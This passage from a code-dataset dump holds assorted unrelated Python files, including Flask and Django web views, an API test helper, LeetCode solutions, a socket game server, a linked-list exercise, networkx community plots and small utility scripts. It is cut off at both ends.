delete\n@app.route('/teacher/delete//', methods=['GET', 'POST'])\ndef teacher_delete(id):\n teacher = Teacher.query.get_or_404(id)\n if len(teacher.module_sessions) > 0 or len(teacher.teacher_attendances) > 0:\n flash(\"you can't delete this Teacher because it is in Relation with other Records\", 'alert-danger')\n if len(teacher.module_sessions) > 0:\n flash(\"you have to break the relation with the Module Sessions first\")\n if len(teacher.teacher_attendances) > 0:\n flash(\"you have to break the relation with the Teacher Attendances first\")\n return redirect(url_for('teacher_view', id=id))\n db.session.delete(teacher)\n db.session.commit()\n flash('Teacher: ' + str(teacher.name) + ' is deleted', 'alert-success')\n return redirect(url_for('teacher_index'))\n\n","sub_path":"app/routesBasicTables.py","file_name":"routesBasicTables.py","file_ext":"py","file_size_in_byte":31008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"545090527","text":"# _*_ coding : utf-8 _*-\n#作者jlx\n# @Time: 2020/5/18 19:51\n#@Email:1710770490@qq.com\n#@File:baseobject.py\n'''封装http请求'''\nfrom base_page.common import comm\nfrom base_page.logger import logger\nimport requests,json\n\n\nclass baseObject(comm):\n INDEX=0\n def __init__(self):\n self.initialize()\n def initialize(self):\n da = self.read_yaml() #获取url\n self.url=da['api_url']['test_api']\n self.headers = {}\n def data_convert(self,data,files):\n if isinstance(data,dict):\n data = json.dumps(data)\n if files:\n data = json.loads(data)\n return data\n\n def file_convert(self,files):\n files = files[1:len(files)-1]\n # print(\"属性:\",eval(files),type(files))\n return eval(files)\n def headers_init(self,headers,files):\n self.headers = {'Content-Type': 'application/json'}\n for key,value in headers.items():\n self.headers[key]=value\n if files:\n self.headers={}\n for key, value in headers.items():\n self.headers[key] = value\n def name_convert(self,name):\n if \"${{\" in name and \"}}\" in name:\n value = name.split(\"{{\")[1].split(\"}}\")[0]\n value = self.read_extract(value)\n name=name.split('$')[0] + value\n self.url = self.url+name\n else:\n self.url = self.url+name\n def post(self,data,files):\n res = requests.request('post',url=self.url,data=data,headers=self.headers,files=files)\n return res.json()\n def get(self,data,files):\n res = requests.request('get',url=self.url,data=data,headers=self.headers,files=files)\n return res.json()\n #传值\n def sendinfo(self,data,res):\n if 'extract' in data and data['extract']: #如果存在提取变量的字段\n for key, value in data['extract'].items():\n extract = {}\n extract[key] = res[value]\n self.write_yaml(extract) #存到yaml文件中\n #断言\n def validate(self,yuqi,shiji):\n num = baseObject.INDEX\n for key,value in yuqi.items():\n if key in shiji:\n if value != shiji[key]:\n print(\"用例{3}判断为:{2}!\\n返回值:{0}!= 预期结果:{1}\".format(shiji[key], value, False,num))\n assert shiji[key] == value, \"实际与预期不符\"\n else:\n if isinstance(shiji,list):\n for data in shiji:\n logger.info(\"这是接口返回值:{0}\".format(data))\n yuqi_new = {}\n yuqi_new[key] = value\n self.validate(yuqi=yuqi_new, shiji=data)\n elif isinstance(shiji,dict):\n for _key,_value in shiji.items():\n if isinstance(_value,dict) and (key in _value):\n print(\"这是实际;\", _value)\n yuqi_new = {}\n yuqi_new[key]=value\n self.validate(yuqi=yuqi_new,shiji=_value)\n def base_info(self,mother,name,data=None,headers=None,files=None):\n if files:\n files = self.file_convert(files)\n if data:\n data = self.data_convert(data,files)\n if headers:\n self.headers_init(headers,files)\n if name:\n self.name_convert(name)\n res=''\n mother = mother.upper()\n if mother=='POST':\n res = self.post(data,files)\n elif mother=='GET':\n res = self.get(data,files)\n baseObject.INDEX += 1\n logger.info(\"-->>>开始测试用例{0},这是接口url:{1}\".format(baseObject.INDEX, self.url))\n logger.info(\"这是接口入参:{0}\".format(data))\n logger.info(\"这是请求头:{1},这是接口返回值:{0}\".format(res, headers))\n self.initialize()\n return res\n","sub_path":"jiekou_work/base_page/baseobject.py","file_name":"baseobject.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"46961950","text":"from django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views import generic\n\nfrom .forms import DayCreateForm\nfrom .models import Day\n\n\n# Create your views here.\n\n\nclass IndexView(LoginRequiredMixin, generic.ListView):\n model = Day\n paginate_by = 8\n login_url = '/buybuy/signin/'\n\n def get_queryset(self):\n return Day.objects.filter(user=self.request.user)\n\n\nclass AddView(LoginRequiredMixin, generic.CreateView):\n model = Day\n form_class = DayCreateForm\n # fields = '__all__'\n login_url = '/buybuy/signin/'\n\n # 単純なフォームだったらform_classはいらなくてこれでok\n # fields = '__all__'\n\n # redirect()はhttp response objectを返す関数\n # reverse_lazy()は文字列を返す関数\n success_url = reverse_lazy('memoapp:index')\n\n def form_valid(self, form):\n messages.success(self.request, 'Your desire was added successfully')\n form.instance.user = self.request.user\n response = super().form_valid(form)\n return response\n\n\nclass UpdateView(LoginRequiredMixin, generic.UpdateView):\n model = Day\n form_class = DayCreateForm\n login_url = '/buybuy/signin/'\n success_url = reverse_lazy('memoapp:index')\n\n def form_valid(self, form):\n response = super().form_valid(form)\n messages.success(self.request, 'Your desire is updated')\n return response\n\n\nclass DeleteView(LoginRequiredMixin, generic.DeleteView):\n model = Day\n login_url = '/buybuy/signin/'\n success_url = reverse_lazy('memoapp:index')\n\n def delete(self, request, *args, **kwargs):\n response = super().delete(self)\n messages.success(self.request, 'Deleted successfully')\n return response\n\n\nclass DetailView(LoginRequiredMixin, generic.DetailView):\n model = Day\n login_url = '/buybuy/signin/'\n\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('memoapp:signin')\n template_name = 'memoapp/signup.html'\n\n def post(self, request, *args, **kwargs):\n response = super().post(self)\n messages.success(self.request, 'Your account was created successfully')\n return response\n\n\n# class ProfileView(generic.TemplateView):\n# model = User\n# template_name = 'memoapp/base.html'\n\n\n'''function\ndef index(request):\n context = {\n 'day_list': Day.objects.all(),\n }\n return render(request, 'memoapp/day_list.html', context)\n\n\ndef add(request):\n # context = {\n # 'form': DayCreateForm()\n # }\n # return render(request, 'memoapp/day_form.html', context)\n\n # 送信内容をもとにフォームを作る。POSTじゃなければ空のフォーム\n form = DayCreateForm(request.POST or None)\n\n # method=POST,つまり送信ボタンを押した時、入力内容に問題が無ければ\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('memoapp:index')\n\n # 通常時にページアクセスや、入力内容に誤りがあればまたページを表示\n context = {\n 'form': form\n }\n return render(request, 'memoapp/day_form.html', context)\n\n\ndef update(request, pk):\n # urlのpkをもとに、Dayを取得\n day = get_object_or_404(Day, pk=pk)\n\n # フォームに取得したDayを紐付ける\n form = DayCreateForm(request.POST or None, instance=day)\n\n # method=POST,つまり送信ボタンを押した時、入力内容に問題が無ければ\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('memoapp:index')\n\n # 通常時のページアクセスや、入力内容に誤りがあればまたページを表示\n context = {\n 'form': form\n }\n return render(request, 'memoapp/day_form.html', context) \n\ndef delete(request, pk):\n day = get_object_or_404(Day, pk=pk)\n\n if request.method == 'POST':\n day.delete()\n return redirect('memoapp:index')\n\n\n context = {\n 'day': day,\n }\n return render(request, 'memoapp/day_confirm_delete.html', context)\n\n\ndef detail(request, pk):\n day = get_object_or_404(Day, pk=pk)\n\n context = {\n 'day': day,\n }\n return render(request, 'memoapp/day_detail.html', context)\n\n'''\n","sub_path":"project/memoapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"70379142","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 17 18:31:38 2020\r\n\r\n@author: BAI Haoyue\r\n\r\n\r\nQ53 Maximum Subarray\r\n\r\nGiven an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\r\n\r\nPython3\r\n\"\"\"\r\n\r\nclass Solution:\r\n def maxSubArray(self, nums: List[int]) -> int:\r\n # init buf list with the same length of the list nums\r\n buf = [0] * len(nums)\r\n # assign the first value of nums to the first value of buf\r\n buf[0] = nums[0]\r\n \r\n for i in range(1, len(nums)):\r\n \r\n buf[i] = max(nums[i], nums[i] + buf[i-1])\r\n \r\n return max(buf)","sub_path":"code/Q53.py","file_name":"Q53.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"401547693","text":"# -*= encoding: utf-8 *-*\nimport argparse,os,sys,csv\n\ndef extracttweets(listtweets,date1,date2,fileout):\n #remove header\n listtweets.readline()\n for line in listtweets:\n date = float(line.strip().split(',')[0])\n if date < date1:\n continue\n elif date > date2:\n print('Finished treating file',listtweets.name)\n print(date,'>',date2)\n break\n else:\n fileout.write(line)\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i','--input',\n type=argparse.FileType('r'),\n required=True,\n help=\"Input file [SORTED BY DATES]\")\n parser.add_argument('-d1','--date1',\n type=float,\n required=True,\n help=\"Epoch time, beginning of the period\")\n parser.add_argument('-d2','--date2',\n type=float,\n required=True,\n help=\"Epoche time, ending of the period\")\n parser.add_argument('-o','--output',\n type=argparse.FileType('w'),\n required=True,\n help=\"Output file,\")\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n extracttweets(args.input,args.date1,args.date2,args.output)\n\n args.input.close()\n args.output.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"version_20160401.dir/linkprediction.dir/preliminarystudy.dir/test_sim_june_month.dir/tweetcontent.dir/extract_usertweet_periods.py","file_name":"extract_usertweet_periods.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"359177031","text":"#! /usr/bin/env python\n\n# Copyright (c) 2015-2016 ARM Limited\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This script reads the map file generated after the build process and prints\n memory layout information of an nRF51 application.\n USAGE: memory_info.py exec_filepath heap_warning_threshold\n\"\"\"\n\nimport sys\nimport os.path\nimport re\nimport subprocess\nfrom distutils import spawn\n\nARM_SIZE_UTILITY = 'arm-none-eabi-size'\nHEAP_SYMBOL = 'heap'\nSTACK_SYMBOL = 'stack'\nBSS_SYMBOL = 'bss'\nDATA_SYMBOL = 'data'\n\nfail_color = ''\nwarning_color = ''\n\n# If colorama is present, set the fail color to red\ntry:\n from colorama import init, deinit, Fore\n fail_color = Fore.RED\n warning_color = Fore.BLUE\nexcept:\n pass\n\ngeneric_pattern = '^(?P\\\\.(?P
{0})\\\\s+(?P\\\\d+))\\\\s+\\\\d+$'\ncompiled_patterns = [re.compile('^(?P(?P
section)\\\\s+size)\\\\s+addr$'),\n re.compile(generic_pattern.format(DATA_SYMBOL)), re.compile(generic_pattern.format(BSS_SYMBOL)),\n re.compile(generic_pattern.format(HEAP_SYMBOL)), re.compile(generic_pattern.format(STACK_SYMBOL))]\n\ndef fail(message):\n print(fail_color + 'ERROR: ' + message)\n\n # If we've included ANSI color in output, reset the output style\n if fail_color:\n print(Fore.RESET)\n deinit()\n\n return 1\n\ndef warning(message):\n output = warning_color + 'WARNING: ' + message\n\n # If we've included ANSI color in output, reset the output style\n if warning_color:\n output += Fore.RESET\n deinit()\n\n return output\n\ndef main(arguments):\n # If using ANSI coloring is available, initialize colorama\n if fail_color and warning_color:\n init()\n\n # Ensure the right number of arguments are supplied\n if len(arguments) != 2:\n return fail('Improper use of memory_info.py.\\nUSAGE: memory_info.py exec_filepath heap_warning_threshold.')\n exec_filepath = arguments[0]\n warning_threshold = 0\n try:\n warning_threshold = int(arguments[1])\n if warning_threshold < 0:\n return fail('Second argument of memory_info.py must be a positive integer. Found \\'{0}\\'.'.format(arguments[1]))\n except ValueError:\n return fail('Second argument of memory_info.py must be a positive integer. Found \\'{0}\\'.'.format(arguments[1]))\n\n # Test if required utility exists\n if not spawn.find_executable(ARM_SIZE_UTILITY):\n print(warning('\\'{0}\\' could not be found. No memory usage information will be reported.'.format(ARM_SIZE_UTILITY)))\n return 0\n\n # Execute arm-none-eabi-size and get output\n process = subprocess.Popen([ARM_SIZE_UTILITY, '-A', exec_filepath], stdout=subprocess.PIPE)\n input = process.communicate()[0].strip()\n\n # Process output to remove memory addresses and print warnings when heap is low\n warnings_list = []\n print('Memory usage for \\'{0}\\''.format(exec_filepath))\n for line in input.split(os.linesep):\n for index, pattern in enumerate(compiled_patterns):\n match = re.match(pattern, line)\n if match:\n print(match.group('useful_info'))\n if match.group('section') == HEAP_SYMBOL and warning_threshold > int(match.group('size')):\n warnings_list.append(warning('Available heap < {0} bytes.'.format(warning_threshold)))\n break\n print(os.linesep.join(warnings_list))\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"nordic-nrf51822-gcc/scripts/memory_info.py","file_name":"memory_info.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"349188102","text":"from django.urls import path\nfrom .views import register, home, products, add_view, delete_view, edit_view, place_order\n\napp_name = 'seller'\n\nurlpatterns = [\n path('', home, name = 'home'),\n path('register/', register, name = 'register'),\n path('products/', products, name = 'products'),\n path('products/new', add_view, name = 'new-product'),\n path('products//edit', edit_view, name = 'edit-product'),\n path('products//delete', delete_view, name = 'delete-product'),\n path('placeorder/', place_order, name = 'place-order')\n]\n","sub_path":"sellers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"523293316","text":"from socket import *\nfrom _thread import *\nimport json\n\n\nclass Server:\n def __init__(self, ip, anzahl):\n\n self.host = ip\n self.port = 40000\n\n self.sock = socket(AF_INET, SOCK_STREAM)\n\n self.sock.bind((self.host, self.port))\n\n self.sock.listen(anzahl + 1)\n\n self.conns = []\n self.players = []\n self.names = []\n while len(self.conns) < anzahl:\n conn, addr = self.sock.accept()\n self.conns.append(conn)\n\n for number, conn in enumerate(self.conns):\n conn.send('init'.encode())\n init = conn.recv(1024).decode()\n init = init.split(';')\n if init[0] is 'Spieler':\n self.players.append(conn)\n self.names.append(init[1])\n elif init is 'Welt':\n self.world = conn\n print('Alle Spieler verbunden.')\n for player in self.players:\n start_new_thread(clientthread, (player, self.world, number,))\n data = [0, 0,\n ['start', [len(self.players)], {'%d' % number: '%s' % name for number, name in enumerate(self.names)}]]\n self.world.send(json.dumps(data))\n\n\ndef clientthread(player, world, number):\n data = 'Spieler %d verbunden.\\n' % number\n player.send(data.encode())\n while True:\n # Receive request from instance Game\n data = player.recv(1024)\n # Check if message type is request.\n msg_type = json.loads(data)[1]\n\n if msg_type is 1:\n # Sends request to world.\n world.send(data)\n else:\n data = [3, 0, ['Fehler: Keine gültige Anfrage.', [], {}]]\n player.send(json.dumps(data))\n\n # Receive response from World\n data = world.recv(1024)\n # Check if message type is response.\n msg_type = json.loads(data)[1]\n if msg_type is 1:\n # Sends request to world.\n player.send(data)\n else:\n data = [3, 0, ['Fehler: Keine gültige Antwort.', [], {}]]\n player.send(json.dumps(data))\n player.close()\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"77762085","text":"from __future__ import print_function\nimport unittest\n\nclass linked_list:\n class node:\n def __init__ (self, value, next):\n self.value = value\n self.next = next\n\n # do not put in getters and setters as they are not needed\n\n def __init__(self, initial = None):\n # for extra credit, add in the elements of initial\n self.front = self.back = None\n\n def empty(self):\n return self.front == self.back == None\n\n def __iter__(self):\n self.current = self.front\n return self\n\n def __next__(self):\n if self.current:\n tmp = self.current.value\n self.current = self.current.next\n return tmp\n else:\n raise StopIteration()\n\n def __str__(self):\n pass\n\n def __repr__(self):\n # extra credit\n pass\n\n def push_front(self, value):\n old = self.front\n new = self.node(value, self.front)\n if self.empty():\n self.front = self.back = self.node(value, None)\n else:\n new.next = old\n self.front = new\n\n def push_back(self, value):\n\n new = self.node(value, None)\n\n if self.empty():\n\n self.push_front(value)\n\n else:\n\n self.back.next = new\n\n self.back = new\n\n\n\n def pop_front(self):\n\n\n if self.empty():\n\n raise RuntimeError\n\n elif self.front == self.back:\n\n new = self.front.value\n\n self.front = self.back = None\n\n return new\n else:\n\n new = self.front.value\n\n self.front = self.front.next\n\n return new\n\n\n def pop_back(self):\n\n if self.empty():\n\n raise RuntimeError\n\n elif self.front == self.back:\n\n new = self.front.value\n\n self.front = self.back = None\n\n return new\n\n else:\n sheesh = self.back.value\n\n new = self.front\n\n while new.next != self.back:\n\n new = new.next\n\n self.back = new\n\n new.next = None\n\n return sheesh\n\n\n\nclass test_linked_list (unittest.TestCase):\n def test_none(self):\n self.assertTrue(linked_list().empty())\n def test_pop_front_empty(self):\n self.assertRaises(RuntimeError, lambda: linked_list().pop_front())\n def test_pop_back_empty(self):\n self.assertRaises(RuntimeError, lambda: linked_list().pop_back())\n def test_push_back_pop_front(self):\n ll = linked_list()\n ll.push_back(1)\n ll.push_back(2)\n ll.push_back(3)\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_front(), 1)\n self.assertEquals(ll.pop_front(), 2)\n self.assertEquals(ll.pop_front(), 3)\n self.assertTrue(ll.empty())\n def test_push_front_pop_front(self):\n ll = linked_list()\n ll.push_front(1)\n ll.push_front(2)\n ll.push_front(3)\n self.assertEquals(ll.pop_front(), 3)\n self.assertEquals(ll.pop_front(), 2)\n self.assertEquals(ll.pop_front(), 1)\n self.assertTrue(ll.empty())\n def test_push_front_pop_back(self):\n ll = linked_list()\n ll.push_front(1)\n ll.push_front(2)\n ll.push_front(3)\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_back(), 1)\n self.assertEquals(ll.pop_back(), 2)\n self.assertEquals(ll.pop_back(), 3)\n self.assertTrue(ll.empty())\n def test_push_back_pop_back(self):\n ll = linked_list()\n ll.push_back(1)\n ll.push_back(\"foo\")\n ll.push_back([3,2,1])\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_back(),[3,2,1])\n self.assertEquals(ll.pop_back(), \"foo\")\n self.assertEquals(ll.pop_back(), 1)\n self.assertTrue(ll.empty())\n\n\n","sub_path":"Assig 1/tutor/Tutoring.py","file_name":"Tutoring.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"621037856","text":"# -*- coding: utf-8 -*-\nimport os\nimport urllib\nfrom flask import Flask, render_template, make_response, abort, request\nfrom google.appengine.api import urlfetch\nimport cloudstorage as gcs\n\napp = Flask(__name__)\n# メモ\n# パッケージのインストール方法\n# pip install -t lib -r requirements.txt\n\nhostname = \"ichiwear.jp\"\nbucket_name = \"ichiwearjp.appspot.com\"\n\ndef is_dev():\n \"開発モードならばTrueを返却する\"\n server_software = os.getenv('SERVER_SOFTWARE', '')\n if server_software.startswith(\"Development\"):\n return True\n else:\n return False\n\n@app.route(\"/\")\ndef index():\n \"トップページ\"\n return render_template('index.html',\n version=1,station_id=0,hostname=hostname)\n\n@app.route(\"/\")\ndef station(id):\n \"個別駅ページ\"\n if(id < 1):\n abort(404)\n return render_template('index.html',\n version=1,station_id=id,hostname=hostname)\n\n\n@app.route(\"/station/\")\ndef station_json(id):\n try:\n gcs_file = gcs.open(\"/%s/json/%07d.json\" % (bucket_name,id));\n body = gcs_file.read()\n gcs_file.close()\n res = make_response(body)\n res.headers['Content-Type'] = 'application/json'\n res.headers['cache-control'] = 'public, max-age=3600'\n return res\n except gcs.errors.NotFoundError:\n # 見つからないケース\n abort(404)\n\n@app.route(\"/twitter_card_image/\")\ndef station_image(id):\n try:\n gcs_file = gcs.open(\"/%s/image/%07d.png\" % (bucket_name,id));\n body = gcs_file.read()\n gcs_file.close()\n res = make_response(body)\n res.headers['Content-Type'] = 'image/png'\n res.headers['cache-control'] = 'public, max-age=3600'\n return res\n except gcs.errors.NotFoundError:\n # 見つからないケース\n abort(404)\n\n\n@app.route(\"/guide.html\")\ndef guide():\n return render_template('guide.html',version=1)\n\n@app.route(\"/privacy.html\")\ndef privacy():\n return render_template('privacy.html',version=1)\n\n@app.route(\"/upload/\",methods=['POST'])\ndef setup(path):\n \"gcsにファイルをアップロードする。ローカルサーバーでのみ使える\"\n # URLデコードする\n path = urllib.unquote(path)\n if is_dev():\n # ローカルサーバーのみで使える\n filename = \"/%s/%s\" % (bucket_name,path)\n write_retry_params = gcs.RetryParams(backoff_factor=1.1)\n content_type = request.headers[\"Content-Type\"]\n gcs_file = gcs.open(filename,'w',content_type=content_type,retry_params=write_retry_params)\n gcs_file.write(request.data)\n gcs_file.close()\n return \"OK\"\n else:\n abort(404)\n\n@app.route(\"/twitter_card\")\ndef twitter_card():\n if is_dev():\n ruby = request.args.get('ruby','')\n name = request.args.get('name','')\n address = request.args.get('address','')\n return render_template('twitter_card.html',ruby=ruby,name=name,address=address)\n else:\n abort(404)\n\n@app.route(\"/w285ng\")\ndef test_twitter_card():\n \"トップページ\"\n return render_template('test_twitter_card.html',hostname=hostname)\n","sub_path":"gae/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"614545173","text":"import pafy\n\ndef get_audio(video):\n audio = video.getbestaudio()\n audio.download()\n\ndef get_playlist(link):\n playlist = pafy.get_playlist2(link)\n for video in playlist:\n get_audio(video)\n\ndef get_video(link):\n video = pafy.new(link)\n get_audio(video)\n\ndef main():\n link = input(\"Enter music video / playlist url: \")\n try:\n if \"playlist\" in link:\n get_playlist(link)\n else:\n get_video(link)\n print(\"\\n\")\n except:\n print(\"\\n\\nError downloading. Check that: link is valid, internet connection is availible, and youtube-dl is up to date.\\n\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"musicDownloader.py","file_name":"musicDownloader.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"330667477","text":"#this will label the largest community as colored. I'm using P14T3\n#slancast@scg4.stanford.edu:/srv/gsfs0/projects/snyder/slancast/repertoire/\n#Andrew is interested in plotting the largest community, too. I will do this with\n#the original formatting and with a new formatting just on that community, too.\n\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport community\nimport pyparsing\nimport pickle\n\n'''\nfh=open(\"edgefiles/edgesstringP14T3.csv\", 'r')\nfg=fh.readlines()\nedges=[]\nG = nx.Graph()\nfor entry in fg:\n\tentry=entry.split(\",\")\n\tif len(entry) == 2:\n\t\tG.add_node(entry[0])\n\t\tG.add_node(entry[1].strip())\n\t\tG.add_edge(entry[0],entry[1].strip())\n\t\t\n\nnx.write_gml(G,\"P14T3.gml.gz\")\n'''\n\nG = nx.read_gml(\"P14T3.gml.gz\")\n\npartition = community.best_partition(G)\n\nwith open(\"P14T3communities.txt\", 'wb') as f:\n pickle.dump(partition, f)\n\nmost_common={}\nfor entry in partition.values():\n\tif entry in most_common:\n\t\tmost_common[entry] = most_common[entry]+1\n\telse:\n\t\tmost_common[entry] = 1\n\t\t\n#most_common_community = max(most_common, key=lambda key: most_common[key])\n#I am using the sorted function instead to give the second most common community too.\n\nmost_common_community=sorted(most_common, key=most_common.get, reverse=True)[0]\n\nsecond_most_common_community=sorted(most_common, key=most_common.get, reverse=True)[1]\n\nthird_most_common_community=sorted(most_common, key=most_common.get, reverse=True)[2]\n\nprint(most_common_community)\n\nprint(\"adding nodes\")\n\nlist_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == most_common_community:\n \tlist_nodes.append(entry)\n \t\nsecond_list_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == second_most_common_community:\n \tsecond_list_nodes.append(entry)\n \t\nthird_list_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == third_most_common_community:\n \tthird_list_nodes.append(entry)\n\npos = pickle.load(open(\"P14T3graphLayout.txt\",\"rb\"))\n\n'''\npos = nx.fruchterman_reingold_layout(G)\n\n\nwith open(\"P14T3graphLayout.txt\", 'wb') as f:\n pickle.dump(pos, f)\n#saving layout for reuse.\n'''\n\n\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, second_list_nodes, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunitytwo.pdf\")\nplt.clf()\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, third_list_nodes, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunitythrid.pdf\")\nplt.clf()\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunityone.pdf\")\nplt.clf()\n\n\nH = G.subgraph(list_nodes)\nnx.draw_networkx_nodes(H, pos, node_shape=\".\", linewidths =0.0, node_color='green',node_size=2.5)\nnx.draw_networkx_edges(H, pos, width=0.001)\n\nplt.savefig(\"./P14T3Subgraph.pdf\")\nplt.clf()\n\n\nI = nx.node_connected_component(G,list_nodes[0])\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunities.pdf\")\nplt.clf()\n\nI = nx.node_connected_component(G,second_list_nodes[0])\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunitiessecond.pdf\")\nplt.clf()\n\nI = nx.node_connected_component(G,third_list_nodes[0])\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunitiesthird.pdf\")\nplt.clf()\n\npos = nx.fruchterman_reingold_layout(H)\nnx.draw_networkx_nodes(H, pos, node_shape=\".\", linewidths =0.0, node_color='green',node_size=2.5)\nnx.draw_networkx_edges(H, pos, width=0.001)\n\nplt.savefig(\"./P14T3SubgraphNewLayout.pdf\")\nplt.clf()\n\n","sub_path":"networkxP14T3colored.py","file_name":"networkxP14T3colored.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"646966816","text":"import plotly.express as px\r\nimport numpy as np\r\nimport csv\r\n\r\nwith open(\"coffee.csv\") as data_file:\r\n df = csv.DictReader(data_file)\r\n fig = px.scatter(df, x = \"Coffee in ml\", y = \"sleep in hours\", color = \"week\")\r\n fig.show()\r\n\r\ndef get_data_source(data_path):\r\n coffee = []\r\n sleep = []\r\n with open(data_path) as data_csv:\r\n bruh = csv.DictReader(data_csv)\r\n for row in bruh:\r\n coffee.append(float(row['Coffee in ml']))\r\n sleep.append(float(row['sleep in hours']))\r\n return {\"x\": coffee, \"y\": sleep}\r\n\r\ndef find_correlation(data_source):\r\n correlation = np.corrcoef(data_source[\"x\"], data_source[\"y\"])\r\n print(correlation[0,1])\r\n\r\ndef setup():\r\n data_path = \"coffee.csv\"\r\n data_source = get_data_source(data_path)\r\n find_correlation(data_source)\r\n\r\nsetup()","sub_path":"coffee.py","file_name":"coffee.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"267657254","text":"\"\"\"\nGiven an array A of positive lengths, return the largest perimeter of a triangle with non-zero area, formed from 3 of these lengths.\n\nIf it is impossible to form any triangle of non-zero area, return 0.\n\nExample 1:\n Input: [2,1,2]\n Output: 5\n\nExample 2:\n Input: [1,2,1]\n Output: 0\n\nExample 3:\n Input: [3,2,3,4]\n Output: 10\n\nExample 4:\n Input: [3,6,2,3]\n Output: 8\n\nNote:\n 3 <= A.length <= 10000\n 1 <= A[i] <= 10^6\n\"\"\"\n\ndef largestPerimeter(A):\n # sort the lengths list A\n A 